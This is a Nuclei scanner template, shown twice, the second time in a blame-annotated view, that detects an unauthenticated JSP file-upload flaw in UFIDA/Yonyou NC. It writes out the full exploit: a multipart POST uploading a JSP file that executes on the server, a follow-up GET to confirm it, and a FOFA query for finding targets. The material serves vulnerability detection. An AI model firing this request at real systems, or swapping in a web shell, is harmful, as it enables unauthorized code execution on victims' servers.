nuclei-templates/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-file...

id: yonyou-nc-grouptemplet-fileupload

info:
  name: UFIDA NC Grouptemplet Interface - Unauthenticated File Upload
  author: SleepingBag945
  severity: critical
  description: |
    The UFIDA NC Grouptemplet Interface permits unauthenticated users to upload potentially malicious files.
  reference:
    - https://www.seebug.org/vuldb/ssvid-99547
    - https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="用友-UFIDA-NC
  tags: yonyou,intrusive,ufida,fileupload
variables:
  v1: "{{rand_int(1,100)}}"

http:
  - raw:
      - |
        POST /uapim/upload/grouptemplet?groupid={{v1}}&fileType=jsp HTTP/1.1
        Host: {{Hostname}}
        Content-type: multipart/form-data; boundary=----------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7

        ------------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7
        Content-Disposition: form-data; name="upload"; filename="{{randstr_1}}.jsp"
        Content-Type: application/octet-stream

        <%out.println("{{randstr_2}}");%>
        ------------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7--
      - |
        GET /uapim/static/pages/{{v1}}/head.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200"
          - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
        condition: and
# digest: 4a0a0047304502202c766a3202a46060a829d4b89895ae36490c268ec1e79e7ccd4ef68904687d2d022100ad6cdfb33e6377226c2903589eac7542d06e8be63c8e077a8471ab59ad1a8f25:922c64590222798bb761d5b6d8e72950
Templates - update 2023-09-15 12:23:57 +00:00			`id: yonyou-nc-grouptemplet-fileupload`
Added some Templates 2023-08-18 03:22:06 +00:00
			`info:`
Templates - update 2023-09-15 12:23:57 +00:00			`name: UFIDA NC Grouptemplet Interface - Unauthenticated File Upload`
Added some Templates 2023-08-18 03:22:06 +00:00			`author: SleepingBag945`
			`severity: critical`
Templates - update 2023-09-15 12:23:57 +00:00			`description: \|`
			`The UFIDA NC Grouptemplet Interface permits unauthenticated users to upload potentially malicious files.`
Added some Templates 2023-08-18 03:22:06 +00:00			`reference:`
			`- https://www.seebug.org/vuldb/ssvid-99547`
Templates - update 2023-09-15 12:23:57 +00:00			`- https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py`
			`metadata:`
templateman update 2023-10-14 11:27:55 +00:00			`verified: true`
updated templates 2023-09-17 16:11:07 +00:00			`max-request: 2`
Templates - update 2023-09-15 12:23:57 +00:00			`fofa-query: app="用友-UFIDA-NC`
updated-templates-p 2023-09-17 08:51:38 +00:00			`tags: yonyou,intrusive,ufida,fileupload`
Added some Templates 2023-08-18 03:22:06 +00:00			`variables:`
			`v1: "{{rand_int(1,100)}}"`

			`http:`
			`- raw:`
			`- \|`
			`POST /uapim/upload/grouptemplet?groupid={{v1}}&fileType=jsp HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-type: multipart/form-data; boundary=----------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7`

			`------------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7`
			`Content-Disposition: form-data; name="upload"; filename="{{randstr_1}}.jsp"`
			`Content-Type: application/octet-stream`

			`<%out.println("{{randstr_2}}");%>`
			`------------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7--`
			`- \|`
			`GET /uapim/static/pages/{{v1}}/head.jsp HTTP/1.1`
			`Host: {{Hostname}}`
Templates - update 2023-09-15 12:23:57 +00:00
Added some Templates 2023-08-18 03:22:06 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- "status_code_1 == 200"`
			`- "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"`
templateman update 2023-10-14 11:27:55 +00:00			`condition: and`
Auto Template Signing [Thu Oct 19 13:13:50 UTC 2023] :robot: 2023-10-19 13:13:52 +00:00			`# digest: 4a0a0047304502202c766a3202a46060a829d4b89895ae36490c268ec1e79e7ccd4ef68904687d2d022100ad6cdfb33e6377226c2903589eac7542d06e8be63c8e077a8471ab59ad1a8f25:922c64590222798bb761d5b6d8e72950`